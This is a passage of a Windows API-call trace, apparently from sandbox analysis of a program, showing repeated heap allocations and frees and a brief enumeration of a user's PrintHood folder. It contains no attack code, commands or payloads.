[0094.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.292] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="PrintHood\\" [0094.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330810 [0094.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0094.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.292] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33172f8 [0094.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330810 | out: hHeap=0x630000) returned 1 [0094.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330810 [0094.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0094.292] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330810 | out: hHeap=0x630000) returned 1 [0094.292] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.292] PathFindFileNameW (pszPath="") returned="" [0094.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.292] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7efb8ce0, ftCreationTime.dwHighDateTime=0x1d5ba81, ftLastAccessTime.dwLowDateTime=0x37cdb3b0, ftLastAccessTime.dwHighDateTime=0x1d5b659, ftLastWriteTime.dwLowDateTime=0x37cdb3b0, ftLastWriteTime.dwHighDateTime=0x1d5b659, nFileSizeHigh=0x0, nFileSizeLow=0x11197, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_FuF.gif", cAlternateFileName="")) returned 0xffffffff [0094.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33172f8 | out: hHeap=0x630000) returned 1 [0094.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce478 | out: hHeap=0x630000) returned 1 [0094.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318138 [0094.292] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.297] HeapFree 